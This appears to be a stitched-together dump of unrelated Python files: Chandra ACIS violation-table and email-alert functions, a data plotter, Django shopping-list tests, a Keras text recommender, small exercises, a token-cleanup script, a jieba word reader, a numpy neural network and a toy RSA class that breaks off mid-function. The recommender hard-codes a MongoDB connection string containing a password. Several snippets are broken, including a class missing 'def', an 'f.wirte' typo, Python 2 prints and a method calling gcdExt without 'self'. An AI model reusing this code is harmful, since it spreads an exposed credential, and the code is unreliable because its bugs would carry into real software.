dline = dline + atemp[11][i]
#
#--- some foramtting adjustments
#
if len(atemp[0]) < 4:
sp = '\t\t'
else:
sp = '\t'
if len(atemp[1]) < 12:
sp2 = '\t\t\t'
else:
sp2 = '\t\t'
tlen = len(atemp[6])
lval = atemp[6]
for k in range(tlen,4):
lval = ' ' + lval
line = atemp[0] + sp + dline + '\t' + atemp[1] + sp2
line = line + lval + '\t' + atemp[2] + '\t' + atemp[3] + '\t\t'
line = line + atemp[10] + '\t' + str(cval) + '\n'
sline = sline + line
new_list.append(line)
#
#--- print out the table
#
aline = 'obsid target start time int time inst '
aline = aline + 'ccd grat ' + dname + '\n'
aline = aline + '-------------------------------------------------------------'
aline = aline + '----------------------------------------------\n'
aline = aline + sline
ofile = web_dir + 'Year' + str(year) + '/'+ etype + '_' + str(year)
with open(ofile, 'w') as fo:
fo.write(aline)
return new_list
#-----------------------------------------------------------------------------------------------
#-- updateLongTermTable: update a long term violation tables ---
#-----------------------------------------------------------------------------------------------
def updateLongTermTable(html_dir, event, this_year, dname):
"""
updates long term violation tables
Input: html_dir --- web directory path
events --- name of events such as drop (te3_3)
this_year --- the latest year
dname --- column name to use
Output:
violation table file named "event"
"""
line = ''
ytop = int(this_year) + 1
for year in range(1999, ytop):
#line = line + '\nYear' + str(year) + '\n'
fname = html_dir + 'Year' + str(year) + '/' + event.lower() + '_' + str(year)
data = mcf.read_data_file(fname)
for ent in data:
atemp = re.split('\s+', ent)
try:
val = float(atemp[0])
otime = atemp[2]
ntime = str(year) + ':' + otime
ent = ent.replace(otime, ntime)
line = line + ent + '\n'
except:
pass
#
#--- write out the talbe
#
hline = 'obsid target start time int time inst ccd grat ' + dname + '\n'
hline = hline + '-----------------------------------------------------------------------------------------------------------\n'
line = hline + line
oname = html_dir + 'Long_term/' + event.lower()
with open(oname, 'w') as fo:
fo.write(line)
#-----------------------------------------------------------------------------------------------
#-- updateLongTermTable2: update long term sub data tables ---
#-----------------------------------------------------------------------------------------------
def updateLongTermTable2(html_dir, event, this_year):
"""
update long term sub data tables
Input: html_dir web directory path
event name of the event such as te3_3
this_year the latest year
Output: sub data file suchas te3_3_out
"""
line = ''
ytop = int(this_year) + 1
for year in range(1999, ytop):
#
#--- check leap year
#
if mcf.is_leapyear(year):
base = 366.0
else:
base = 365.0
#
#--- read each year's data
#
fname = html_dir + 'Year' + str(year) + '/' + event.lower() + '_out'
data = mcf.read_data_file(fname)
if len(data) == 0:
continue
for ent in data:
atemp = re.split('\t+|\s+', ent)
try:
val = float(atemp[0])
btemp = re.split(':', atemp[1])
#
#--- convert time to year date to fractional year
#
time = float(year) + (float(btemp[0]) + float(btemp[1])/ 86400.0 ) / base
time = round(time, 3)
dlen = len(atemp)
dlst = dlen -1
for j in range(0, dlen):
if j == 1:
line = line + str(time) + '\t'
elif j == dlst:
line = line + atemp[j] + '\n'
else:
line = line + atemp[j] + '\t'
except:
pass
oname = html_dir + 'Long_term/' + event.lower() + '_out'
with open(oname, 'w') as fo:
fo.write(line)
#-----------------------------------------------------------------------------------------------
#-- chkNewHigh: sending out email to warn that there are value violatioins ----
#-----------------------------------------------------------------------------------------------
def chkNewHigh(old_list, new_list, event, dname):
"""
sending out email to warn that there are value violatioins
Input: old_list: old violation table
new_list: new violation table
event: event name
dname: column name to be used
"""
wchk = 0
#
#--- compare old and new list and if there are new entries, save them in "alart"
#
alart = []
for ent in new_list:
chk = 0
ntemp = re.split('\t+|\s+', ent)
for comp in old_list:
otemp = re.split('\t+|\s+', comp)
if(ent == comp) or (ntemp[0] == otemp[0]):
chk = 1
break
if chk == 0:
alart.append(ent)
wchk += 1
#
#--- if there is violations, send out email
#
if wchk > 0:
line = 'ACIS Science Run issued the following warning(s)\n\n'
line = line + "The following observation has a " + event + "Rate in today's science run\n\n"
line = line + 'obsid target start time int time '
line = line + 'inst ccd grat ' + dname + '\n'
line = line + '------------------------------------------------------------'
line = line + '-------------------------------------------\n'
for ent in alart:
line = line + ent + '\n'
line = line + '\nPlese check: https://cxc.cfa.harvard.edu/mta_days/mta_acis_sci_run/'
line = line + 'science_run.html\n'
line = line + '\n or MIT ACIS Site: https://acisweb.mit.edu/asc/\n'
with open(zspace, 'w') as f:
f.wirte(line)
cmd = 'cat ' + zspace + '|mailx -s \"Subject: ACIS Science Run Alert<>'
cmd = cmd + event + 'Rate" isobe\@head.cfa.harvard.edu'
# cmd = 'cat ' + zspace + '|mailx -s \"Subject: ACIS Science Run Alert<>'
# cmd = cmd + event + 'Rate" isobe\@head.cfa.harvard.edu '
# cmd = cmd + swolk\@head.cfa.harvard.edu acisdude\@head.cfa.harvard.edu"'
os.system(cmd)
mcf.rm_files(zspace)
#-----------------------------------------------------------------------------------------------
#-- convert_to_chandra_time: convert time into Chandra Time --
#-----------------------------------------------------------------------------------------------
def convert_to_chandra_time(dtime, ifmt='%Y:%m:%d:%H:%M:%S'):
"""
convert time into Chandra Time
input: dtime --- original time in ifmt
ifmt --- time format
output: stime --- seconds from 1998.1.1
"""
out = time.strftime("%Y:%j:%H:%M:%S", time.strptime(dtime, ifmt))
stime = int(Chandra.Time.DateTime(out).secs)
return stime
|
#!/usr/bin/env python3 -u
# Run python with -u to flush output directly
import sys
import argparse
import numpy as np
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument("file", help="file path to analyze")
parser.add_argument("--no-inputs", help="no display inputs", action="store_true")
parser.add_argument("--no-targets", help="no display targets", action="store_true")
parser.add_argument("-n", "--number", help="max number of inputs and targets displayed", type=int, default=0)
args = parser.parse_args()
path = args.file
print "Loading ", args.file
file = open(path, "r")
input_data = []
target_data = []
l = 0
inputs_nb = 0
inputs_target = 0
for line in file:
error = False
splitted = line.split(":")
if len(splitted) != 2:
continue
raw_inputs = splitted[0].split()
raw_targets = splitted[1].split()
inputs = []
targets = []
for i in range(len(raw_inputs)):
try:
inputs.append( float(raw_inputs[i].strip("\\;")) )
except ValueError:
error = True
break
for i in range(len(raw_targets)):
try:
targets.append( float(raw_targets[i].strip("\\;")) )
except ValueError:
error = True
break
if error:
continue
input_data.append(inputs)
target_data.append(targets)
print "Done with loaded data (size=" + str(len(input_data)) + ")"
subplots = 0
if args.no_inputs is False:
input_data = np.matrix(input_data).transpose()
input_mean = np.mean(input_data, axis=1).getA1()
input_data_size = input_data.shape[0]
subplots += min(args.number, input_data_size) if args.number != 0 else input_data_size
if args.no_targets is False:
target_data = np.matrix(target_data).transpose()
target_mean = np.mean(target_data, axis=1).getA1()
target_data_size = target_data.shape[0]
subplots += min(args.number, target_data_size) if args.number != 0 else target_data_size
print "Done with matrix operations. Shape is " + str(input_data_size) + ":" + str(target_data_size)
######## DISPLAY
n = 0
sax = plt.subplot(subplots, 1, 1)
if args.no_inputs is False:
for i in range(input_data_size):
n += 1
ax = sax if n == 1 else plt.subplot(subplots, 1, n, sharex=sax)
data = input_data[i].getA1()
plt.plot(data)
plt.plot([0, len(data)], [input_mean[i], input_mean[i]], "g")
ax.set_xlim(0, len(data))
# ax.set_ylim(-1.1, 1.1)
if args.number != 0 and i >= min(args.number, input_data_size)-1:
break
if args.no_targets is False:
for i in range(target_data_size):
n += 1
ax = sax if n == 1 else plt.subplot(subplots, 1, n, sharex=sax)
data = target_data[i].getA1()
plt.plot(data, "r")
plt.plot([0, len(data)], [target_mean[i], target_mean[i]], "g")
ax.set_xlim(0, len(data))
ax.set_ylim(-1.1, 1.1)
if args.number != 0 and i >= min(args.number, target_data_size)-1:
break
plt.show()
######## END DISPLAY
|
from PyQt4.QtGui import *
class MyDialog(QDialog):
def __init__(self):
QDialog.__init__(self)
ed = QLineEdit()
ed.setText("홍길동") #텍스트 쓰기
text = ed.text() #텍스트 읽기
# # Watermark로 텍스트 표시
# ed.setPlaceholderText("이름을 입력하시오")
# # 텍스트 모두 선택
# ed.selectAll()
# 에디트는 읽기 전용으로
ed.setReadOnly(True)
#
# # Password 스타일 에디트
# ed.setEchoMode(QLineEdit.Password)
# Layout
layout = QVBoxLayout()
layout.addWidget(ed)
# Set layout on a MyDialog
self.setLayout(layout)
# app
app = QApplication([])
dialog = MyDialog()
dialog.show()
app.exec_()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 23 11:04:54 2020
@author: ctralie
A basic example of dictionaries
"""
import numpy as np
import pickle
chris = {
'year':'supersenior',
'major':'ee',
'brand':'acer',
'grades':{
'audio':95,
'image':60,
'nbody':100
},
10: [-1, 5, 2, 4]
}
chris['favassignment'] = 'fractal'
del chris['grades']
keys = list(chris.keys())
values = list(chris.values())
for myvar in chris.keys():
print(myvar, " value is ", chris[myvar])
|
""" api/tests.py """
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
from .models import Shoppinglist
# Create your tests here.
class ModelTestCases(TestCase):
""" Test cases for models """
def setUp(self):
""" Define test variables """
self.shoppinglist = Shoppinglist(
name="Christmass shopping", description="Shopping for 2018 christmass")
def test_shoppinglist_model(self):
""" Test Shoppinglist model is created """
old_count = Shoppinglist.objects.count()
self.shoppinglist.save()
new_count = Shoppinglist.objects.count()
self.assertNotEqual(old_count, new_count)
class ViewTestCases(TestCase):
""" Test cases for views """
def setUp(self):
""" Define test client """
self.client = APIClient()
self.shoppinglist_data = {
"name": "Easter shopping", "description": " Shopping to gift mum this easter."}
self.response = self.client.post(
reverse('api:create_list'),
self.shoppinglist_data,
format="json")
# get shoppinglist from model
self.shoppinglist = Shoppinglist.objects.get()
def test_shoppinglist_is_created(self):
""" test api can create a shoppinglist """
self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
def test_api_can_get_single_shoppinglist(self):
""" test api can get one shoppinglist """
response = self.client.get(
reverse('api:shoppinglist_details', kwargs={'pk': self.shoppinglist.id}),
format="json")
self.assertContains(response, self.shoppinglist)
def test_api_can_edit_shoppinglist(self):
""" test api can get edit a shoppinglist """
new_shoppinglist_data = {
"name": "Christmass shopping", "description": " Christmass gift 2018."}
response = self.client.put(
reverse('api:shoppinglist_details', kwargs={'pk': self.shoppinglist.id}),
new_shoppinglist_data,
format="json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_api_can_delete_shoppinglist(self):
""" test api can get delete a shoppinglist """
response = self.client.delete(
reverse('api:shoppinglist_details', kwargs={'pk': self.shoppinglist.id}),
format="json"
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
|
from flask import Flask, render_template, request
import tensorflow as tf
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from bson.objectid import ObjectId
from pymongo import MongoClient, cursor
from tensorflow import keras
from tensorflow.keras import layers ,callbacks
client = MongoClient('mongodb+srv://recommendation-yradx:vOghBXFE9ReZo40k@develop.r2hgr.mongodb.net/recommendation?authSource=admin&replicaSet=atlas-siynys-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')
db=client['recommendation-ldprod']
#db=client.recommendation
"""**DATA 01 : BOOKMARKS**"""
res1 = db.op_bookmarks.find()
dat1 = pd.DataFrame(list(res1))
dat1.rename(columns = {'_id' : 'id_bookmark'} , inplace=True)
dat1.rename(columns = {'user' : 'id_user'} , inplace=True)
dat1.rename(columns = {'text' : 'id_text'} , inplace=True)
dat1=dat1.drop(['id_bookmark','updatedAt','createdAt','__v'], axis=1)
if not (dat1.id_text.empty):
dat1.insert(2, "Event1", "Bookmark", allow_duplicates=True)
else :
dat1['Event1'] == "NaN"
dat1=dat1.drop_duplicates()
"""**DATA 02: READS**"""
res2 = db.rc_reads.find()
dat2 = pd.DataFrame(list(res2))
dat2.rename(columns = {'_id' : 'id_read'} , inplace=True)
dat2.rename(columns = {'user' : 'id_user'} , inplace=True)
dat2.rename(columns = {'text' : 'id_text'} , inplace=True)
dat2=dat2.drop(['id_read','updatedAt','createdAt','__v' ], axis=1)
dat2['roles'] = [str(a) for a in dat2['roles']]
dat2['roles']=dat2['roles'].str.strip('[' ']')
dat2['roles']=dat2['roles'].str.strip( "' ")
dat2['roles']=dat2['roles'].str.replace( "', '" ,"," )
if not (dat2.id_text.empty):
dat2.insert(2, "Event2", "Read", allow_duplicates=True)
else :
dat2['Event2'] == "NaN"
indexNames=dat2[dat2["roles"].str.contains("activeClient|activeProspect") == False].index
dat2 =dat2.drop(indexNames, axis=0)
dat2=dat2.drop_duplicates()
"""**DATA 03 : COPIES**"""
res3 = db.rc_copies.find()
dat3 = pd.DataFrame(list(res3))
dat3.rename(columns= {'text': 'id_text'},inplace=True)
dat3.rename(columns= {'user': 'id_user'},inplace=True)
dat3=dat3.drop(['_id' ,'agent', 'host',"content",'createdAt','updatedAt', '__v'] , axis = 1)
if not (dat3.id_text.empty):
dat3.insert(2, "Event3", "Copy", allow_duplicates=True)
else :
dat3['Event3'] == "NaN"
dat3=dat3.drop_duplicates()
"""**Jointure des 03 datas**"""
df1= pd.merge(dat2, dat1, on=["id_user","id_text"] ,how='left')
df2 =pd.merge(df1, dat3, on=["id_user","id_text"],how='outer')
df2 = df2[['id_user','id_text','title','Event1','Event2','Event3']]
df2=df2.drop_duplicates()
"""**ATTRIBUTION DES POIDS A CHAQUE EVENT**"""
event_type_strength = {
'NaN' : 0.0 ,
'Read': 1.0,
'Copy': 2.0,
'Bookmark': 3.0,
'Like' : 4.0
}
df2['Event1'] = df2['Event1'].fillna("NaN")
df2['Event2'] = df2['Event2'].fillna("NaN")
df2['Event3'] = df2['Event3'].fillna("NaN")
df2['Event1'] = df2['Event1'].apply(lambda x: event_type_strength[x])
df2['Event2'] = df2['Event2'].apply(lambda x: event_type_strength[x])
df2['Event3'] = df2['Event3'].apply(lambda x: event_type_strength[x])
df2.insert(6, "rating", 0.0, allow_duplicates=False)
df2['rating'] = df2.sum(axis=1)
col_list = ['id_user','id_text','title','rating']
df2 = df2[col_list]
titre_null=df2[df2['title'].isnull()].index
df2 =df2.drop(titre_null, axis=0)
df2 =df2.drop_duplicates()
"""**Méthode 01 : Neural Networks**"""
data0=df2
user_ids = data0["id_user"].unique().tolist()
user2user_encoded = {x: i for i, x in enumerate(user_ids)}
userencoded2user = {i: x for i, x in enumerate(user_ids)}
text_ids = data0["id_text"].unique().tolist()
text2text_encoded = {x: i for i, x in enumerate(text_ids)}
text_encoded2text = {i: x for i, x in enumerate(text_ids)}
data0["user"] = data0["id_user"].map(user2user_encoded)
data0["text"] = data0["id_text"].map(text2text_encoded)
num_users = len(user2user_encoded)
num_texts = len(text_encoded2text)
data0["rating"] = data0["rating"].values.astype(np.float32)
# min and max ratings will be used to normalize the ratings later
min_rating = min(data0["rating"])
max_rating = max(data0["rating"])
print(
"Number of users: {}, Number of Texts: {}, Min rating: {}, Max rating: {}".format(
num_users, num_texts, min_rating, max_rating
)
)
data0 = data0.sample(frac=1, random_state=42)
x = data0[["user", "text"]].values
# Normalize the targets between 0 and 1. Makes it easy to train.
y = data0["rating"].apply(lambda x: (x - min_rating) / (max_rating - min_rating)).values
# Assuming training on 90% of the data and validating on 10%.
train_indices = int(0.9 * data0.shape[0])
x_train, x_val, y_train, y_val = (
x[:train_indices],
x[train_indices:],
y[:train_indices],
y[train_indices:],
)
EMBEDDING_SIZE = 50
class RecommenderNet(keras.Model):
def __init__(self, num_users, num_texts, embedding_size, **kwargs):
super(RecommenderNet, self).__init__(**kwargs)
self.num_users = num_users
self.num_texts = num_texts
self.embedding_size = embedding_size
self.user_embedding = layers.Embedding(
num_users,
embedding_size,
embeddings_initializer="he_normal",
embeddings_regularizer=keras.regularizers.l2(1e-6),
)
self.user_bias = layers.Embedding(num_users, 1)
self.text_embedding = layers.Embedding(
num_texts,
embedding_size,
embeddings_initializer="he_normal",
embeddings_regularizer=keras.regularizers.l2(1e-6),
)
self.text_bias = layers.Embedding(num_texts, 1)
def call(self, inputs):
user_vector = self.user_embedding(inputs[:, 0])
user_bias = self.user_bias(inputs[:, 0])
text_vector = self.text_embedding(inputs[:, 1])
text_bias = self.text_bias(inputs[:, 1])
dot_user_text = tf.tensordot(user_vector, text_vector, 2)
# Add all the components (including bias)
x = dot_user_text + user_bias + text_bias
# The sigmoid activation forces the rating to between 0 and 1
return tf.nn.sigmoid(x)
model1 = RecommenderNet(num_users, num_texts, EMBEDDING_SIZE)
earlystopping = callbacks.EarlyStopping(monitor ="val_loss", mode ="min", patience = 5 ,restore_best_weights = False)
opt = tf.keras.optimizers.Adam(learning_rate=0.01 )
model1.compile(
optimizer=opt,
loss='mean_squared_error',
metrics=['accuracy']
)
history = model1.fit(
x=x_train,
y=y_train,
batch_size=32,
epochs=100,
verbose=1,
validation_split=0.2,
validation_data=(x_val, y_val),
callbacks =[earlystopping]
)
model1.summary()
#tf.keras.utils.plot_model(model1, to_file='model1.png')
"""
# Plot the loss function
fig, ax = plt.subplots(1, 1, figsize=(10,6))
ax.plot(np.sqrt(history.history['loss']), 'r', label='train')
ax.plot(np.sqrt(history.history['val_loss']), 'b' ,label='val')
ax.set_xlabel(r'Epoch', fontsize=20)
ax.set_ylabel(r'Loss', fontsize=20)
ax.legend()
ax.tick_params(labelsize=20)
# Plot the mean_squared_error
fig, ax = plt.subplots(1, 1, figsize=(10,6))
ax.plot(np.sqrt(history.history['mean_squared_error']), 'r', label='train')
ax.plot(np.sqrt(history.history['val_mean_squared_error']), 'b' ,label='val')
ax.set_xlabel(r'Epoch', fontsize=20)
ax.set_ylabel(r'MeanSquaredError', fontsize=20)
ax.legend()
ax.tick_params(labelsize=20)
# Plot the accuracy
fig, ax = plt.subplots(1, 1, figsize=(10,6))
ax.plot(np.sqrt(history.history['accuracy']), 'r', label='train')
ax.plot(np.sqrt(history.history['val_accuracy']), 'b' ,label='val')
ax.set_xlabel(r'Epoch', fontsize=20)
ax.set_ylabel(r'Accuracy', fontsize=20)
ax.legend()
ax.tick_params(labelsize=20)
plt.plot(history.history["loss"])
plt.plot(history.history["val_loss"])
plt.title("model loss")
plt.ylabel("loss")
plt.xlabel("epoch")
plt.legend(["train", "test"], loc="upper left")
plt.show()
"""
# Let us get a user and see the top recommendations.
def recommended_texts1(user_id) :
user_id = ObjectId(user_id)
#user_id = df2.id_user.sample(1).iloc[0]
# Let us get a user and see the top recommendations.
#user_id = df2.id_user.sample(1).iloc[0]
texts_watched_by_user = data0[data0.id_user == user_id]
texts_not_watched = data0[
~data0["id_text"].isin(texts_watched_by_user.id_text.values)
]["id_text"]
texts_not_watched = list(
set(texts_not_watched).intersection(set(text2text_encoded.keys()))
)
texts_not_watched = [[text2text_encoded.get(x)] for x in texts_not_watched]
user_encoder = user2user_encoded.get(user_id)
user_text_array = np.hstack(
([[user_encoder]] * len(texts_not_watched), texts_not_watched )
)
user_text_array1 = tf.convert_to_tensor(user_text_array, np.float32)
ratings = model1.predict(user_text_array1).flatten()
top_ratings_indices = ratings.argsort()[-10:][::-1]
recommended_text_ids = [
text_encoded2text.get(texts_not_watched[x][0]) for x in top_ratings_indices
]
top_texts_user = (
texts_watched_by_user.sort_values(by="rating", ascending=False)
.head(5)
.title
#.id_text.values
)
liste1= []
#movie_df_rows = data0[data0["title"].isin(top_texts_user)]
for row in top_texts_user:
liste1.append(row)
return liste1
def recommended_texts2(user_id) :
user_id = ObjectId(user_id)
#user_id = df2.id_user.sample(1).iloc[0]
# Let us get a user and see the top recommendations.
#user_id = df2.id_user.sample(1).iloc[0]
texts_watched_by_user = data0[data0.id_user == user_id]
texts_not_watched = data0[
~data0["id_text"].isin(texts_watched_by_user.id_text.values)
]["id_text"]
texts_not_watched = list(
set(texts_not_watched).intersection(set(text2text_encoded.keys()))
)
texts_not_watched = [[text2text_encoded.get(x)] for x in texts_not_watched]
user_encoder = user2user_encoded.get(user_id)
user_text_array = np.hstack(
([[user_encoder]] * len(texts_not_watched), texts_not_watched )
)
user_text_array1 = tf.convert_to_tensor(user_text_array, np.float32)
ratings = model1.predict(user_text_array1).flatten()
top_ratings_indices = ratings.argsort()[-10:][::-1]
recommended_text_ids = [
text_encoded2text.get(texts_not_watched[x][0]) for x in top_ratings_indices
]
recommended_texts = data0[data0["id_text"].isin(recommended_text_ids)]
recommended_texts=recommended_texts.drop_duplicates('title')
liste2 = []
for row in recommended_texts.iterrows():
liste2.append(row[1].title)
return liste2
print("*************FIN**************")
|
#!/usr/bin/python3.4
# -*-coding:Utf-8
liste = [1, 2, 3]
liste2 = list(liste)
liste2.append(4)
print("liste = {}, liste2 = {}".format(liste, liste2))
print("id liste = {}, id liste2 = {}".format(id(liste), id(liste2)))
liste2 = liste
print("id liste = {}, id liste2 = {}".format(id(liste), id(liste2)))
|
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv('data.csv', index_col='year')
# House Price per square foot
df['pxHousePerSqFt'] = df.medPrice / df.medSqFt
# Gallons of Oil per Barrel
bVol = 42.0
# Need 7.48 gallons of oil to raise 1SqFt by 1Ft
galPerCuFt = 7.48
# Cubic feet per barrel
cuFtPerBar = bVol / galPerCuFt
# Oil Price per cubic foot
df['pxOilPerCuFt'] = df.wtisplc / cuFtPerBar
# Oily House Index = House (sqFt) over Oil (cuFt)
df['OHI'] = df.pxHousePerSqFt / df.pxOilPerCuFt
# Forcing higher house price to match XKCD
#df['OHI'] = (df.pxHousePerSqFt * 1.2) / df.pxOilPerCuFt
# What about 80% LTV?
with plt.xkcd():
axes = df.plot(y=['medPrice', 'medSqFt', 'pxHousePerSqFt', 'wtisplc'], subplots=True, layout=(2,2), figsize=(10,8))
axes[1,0].set_xlabel('')
axes[1,1].set_xlabel('')
plt.tight_layout()
plt.savefig('graphs.png')
plt.show()
with plt.xkcd():
axes = df.plot(y=['OHI'], figsize=(10.1,5))
axes.set_xlabel('')
plt.tight_layout()
plt.savefig('ohi.png')
plt.show()
|
class Solution:
# https://leetcode.com/problems/longest-palindromic-substring/discuss/2954/Python-easy-to-understand-solution-with-comments-(from-middle-to-two-ends)
def longestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
res = ""
for i in range(len(s)):
temp = self.isPalindromicSubstring(s, i, i)
if len(res) < len(temp):
res = temp
temp = self.isPalindromicSubstring(s, i, i+1)
if len(res) < len(temp):
res = temp
return res
def isPalindromicSubstring(self, s, i, j):
m = len(s)
while i >= 0 and j <= m-1 and s[i] == s[j]:
i, j = i-1, j+1
return s[i+1:j]
|
# encoding=UTF-8
# Очищает истекшие токены, удаляя их ищ БД
from dotenv import load_dotenv, find_dotenv
from pathlib import Path
import json
import os
import pymysql
import traceback
import time
import sys
path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(path + "/../")
from reviewgramdb import connect_to_db
def clear_tokens():
path = os.path.dirname(os.path.abspath(__file__))
env_path = Path(path + "/../") / '.env'
load_dotenv(dotenv_path=env_path)
timestamp = int(time.time())
cleanupTime = int(os.getenv("TOKEN_CLEANUP_TIME")) * 60
con = connect_to_db()
with con:
cur = con.cursor()
cur.execute("DELETE FROM `token_to_chat_id` WHERE `TOKEN` IN (SELECT `TOKEN` FROM `token_to_user_id` WHERE " + str(timestamp) + " - TSTAMP >= " + str(cleanupTime) + ")")
con.commit()
cur.close()
cur = con.cursor()
cur.execute("DELETE FROM `token_to_user_id` WHERE " + str(timestamp) + " - TSTAMP >= " + str(cleanupTime))
con.commit()
cur.close()
if __name__== "__main__":
clear_tokens()
|
import jieba, os
from jieba import posseg
jieba.default_logger.setLevel(jieba.logging.INFO)
class WordList(object):
def __init__(self, show_progress=False):
self.show_progress = show_progress
def get(self, file):
if self.show_progress:
print('reading: %s' % file)
try:
with open(file, 'r') as f:
txt = f.read()
except UnicodeDecodeError:
try:
with open(file, 'r', encoding='gb2312') as f:
txt = f.read()
except UnicodeDecodeError:
if self.show_progress:
print('decode error, skipping: %s' % file)
txt = ''
return posseg.cut(txt)
def get_from_list(self, file_list):
word_list = []
for f in file_list:
if os.path.exists(f):
if os.path.isdir(f):
l = map(lambda x: f + '/' + x, os.listdir(f))
w = self.get_from_list(l)
if w:
word_list += w
else:
return []
elif f.endswith('.txt'):
word_list += self.get(f)
else:
if self.show_progress:
print('file "%s" does not exist' % f)
return []
return word_list
if __name__ == '__main__':
pass
|
# ###############################
# Michael Vassernis - 319582888
#
#################################
import numpy as np
from helper_functions import softmax
class NNModel(object):
def __init__(self, dims):
self.loss_data = []
self.dims = dims
self.params = []
for i in range(0, len(dims) - 1):
# using sqrt(6) parameters initialization (Optimal according to an old ML paper)
r_w = np.sqrt(6) / np.sqrt(dims[i] + dims[i + 1])
r_b = np.sqrt(6) / np.sqrt(dims[i + 1] + 1)
w = np.random.uniform(-r_w, r_w, (dims[i], dims[i + 1]))
b = np.random.uniform(-r_b, r_b, dims[i + 1])
self.params.append(w)
self.params.append(b)
self.num_params = len(self.params)
def add_loss_data(self, loss):
self.loss_data.append(loss)
def feed_forward(self, input_vec):
curr_layer = input_vec
for i in range(0, self.num_params - 2, 2):
# new layer = old layer * W + b
curr_layer = np.dot(curr_layer, self.params[i]) + self.params[i + 1]
# non linearity
curr_layer = np.tanh(curr_layer)
curr_layer = np.dot(curr_layer, self.params[-2]) + self.params[-1]
# curr_layer = softmax(curr_layer)
return curr_layer
def predict(self, input_vec):
return np.argmax(self.feed_forward(input_vec))
def loss_and_gradients(self, input_vec, y_true, hidden_dropout, input_dropout):
hidden_layers = []
dropouts = []
hidden_layers_tanh = [input_vec * np.random.binomial(1, 1.0 - input_dropout, size=input_vec.shape)]
keep = 1.0 - hidden_dropout
scale = 1.0 / keep
for i in range(0, self.num_params - 2, 2):
hidden_layers.append(np.dot(hidden_layers_tanh[i / 2], self.params[i]) + self.params[i + 1])
dropout = np.random.binomial(1, keep, size=hidden_layers[-1].shape) * scale
dropouts.append(dropout)
hidden_layers_tanh.append(np.tanh(hidden_layers[-1]) * dropout)
y_hat = np.dot(hidden_layers_tanh[len(hidden_layers_tanh) - 1], self.params[-2]) + self.params[-1]
y_hat = softmax(y_hat)
loss = - np.log(y_hat[int(y_true)])
d_loss_d_out = y_hat
d_loss_d_out[int(y_true)] -= 1
grads = []
for t in range(0, len(hidden_layers_tanh)):
index = len(hidden_layers_tanh) - 1 - t
g_b = d_loss_d_out
g_w = np.outer(hidden_layers_tanh[index], d_loss_d_out)
grads.insert(0, g_b)
grads.insert(0, g_w)
if index > 0:
d_loss_d_hidden_act = np.dot(self.params[index * 2], d_loss_d_out)
d_drop_out_loss = dropouts[index - 1]
d_hidden_act_d_hidden = 1 - np.tanh(hidden_layers[index - 1]) ** 2
d_loss_d_out = d_loss_d_hidden_act * d_hidden_act_d_hidden * d_drop_out_loss
return loss, grads
def train_on_example(self, input_vec, y_true, learning_rate, regularization):
loss, grads = self.loss_and_gradients(input_vec, y_true, 0.4, 0.1)
for i in range(0, self.num_params):
# update the parameters with gradients, and add L2 regularization
self.params[i] -= learning_rate * (grads[i] + self.params[i] * regularization)
return loss
|
a = float(input('Altura da parede: '))
l = float(input('Largura da parede: '))
m2 = a * l
t = m2 / 2
print('Com a área da parede sendo de {}m², é necessário {:.1f}L para pintar'.format(m2, t))
|
import math
n = []
li = []
li = [i for i in range(2,10000)]
while li[0] <= int(math.sqrt(10000)):
n.append(li[0])
sss = li[0]
li = [i for i in li if i % sss != 0]
n.extend(li)
while True:
ans = 0
x = int(input())
if x == 0: break
for i in range(x):
ans += n[i]
print(ans)
|
for x in range(1,10):
for y in range(1,10):
ans = x * y
print(str(x) +'x'+ str(y) +'='+ str(ans))
|
class PlotData:
__init__(self, name, title, source, expression, selection, labels):
self.name = name
self.title = tile
self.source = source
self.expression = expression
self.selection = selection
self.labels = labels
|
#class NoneRelase(Exception):
'''
автор: Вацлав
реализация алоритма шифровния RSA
'''
import random
import math
class rsa:
_word = ''
bitSize = 10
e = 29
n=0
d=0
def __init__(self,word):
self.word = word
def __init__(self):
pass
def _textToint(self,word):
'''
метод преобразования текста в соотвествующий код ascii & unicode
работа отлаживается только на acii
>>> a = rsa();a._textToint('hello world')
104101108108111032119111114108100
'''
s = [ord(x) for x in word]
s = ''.join(map(lambda x: [str(x),"0"+str(x)][x<100] ,s) )#если код <100 подставить 0 в начало
s = int(s)
return s
def _intToText(self, intcode):
'''
метод преобразования кода чисел в символы
'''
intcode = str(intcode)
ptr=0
buf = ''
result = ''
for x in range(len(intcode)):
buf+=intcode[x]
ptr+=1
if ptr==3:
ptr=0
result+=chr(int(buf))
buf=''
return result
def encode(self, inword):
self.intcode = self._textToint(inword)
return self.binpow(self.intcode, self.e, self.n)
#return "encode was note define"
def decode(self, output):
text = self.binpow(output, self.d, self.n)
print('decode: ',text)
text = self._intToText(text)
return text
def binpow(self,a, x, mod):
#return math.pow(a,x) % mod
res = 1
a %= mod
while (x):
if (int(x) & 1):
res *= a
res %= mod
a *= a
a %= mod
x /= 2
return res
def rabin_miller(self, m=bitSize, r=10):
if (m == 2):
return True
if ((m < 2) or (m % 2 == 0)):
return False
p = 0
q = m-1
#ищем степень в которую можно возвести
while (q % 2 == 0):
q /= 2
p += 1
#цикл A
while (r):
x = random.randint(2, m-1) # случайное число из диапазона
x = self.binpow(x,q,m) #то самое стремление к х
if (x == 1 or x == m-1):
return True
#цикл Б
for i in range(0,p):
x = (x * x) % m
if (x == m-1):
break
else:
return False
p -= 1
r -= 1
return True
def _primeGenerator(self,bitSize):
'''генерирует простое случайное число заданной длины
'''
start = 2**(bitSize-1)
end = 2**bitSize - 1
ptr = 0
while (1):
prime = random.randint(start, end)
ptr+=1
#print(ptr)
if self.rabin_miller(prime):
return prime
def gcdExt(self,a,b):
'''
алгоритм нахождения расширенного алгоритма Евклида
возвращает картеж из: d - НОД, x, y из
ax + by = НОД(a, b)
'''
x=y=d=0
if b==0:
x=1
y=0
return a,x,y
d,x,y = gcdExt(b,a%b)
x,y = y, x - (a/b) * y
return d,x,y
def keyGenerator(self):
while 1:
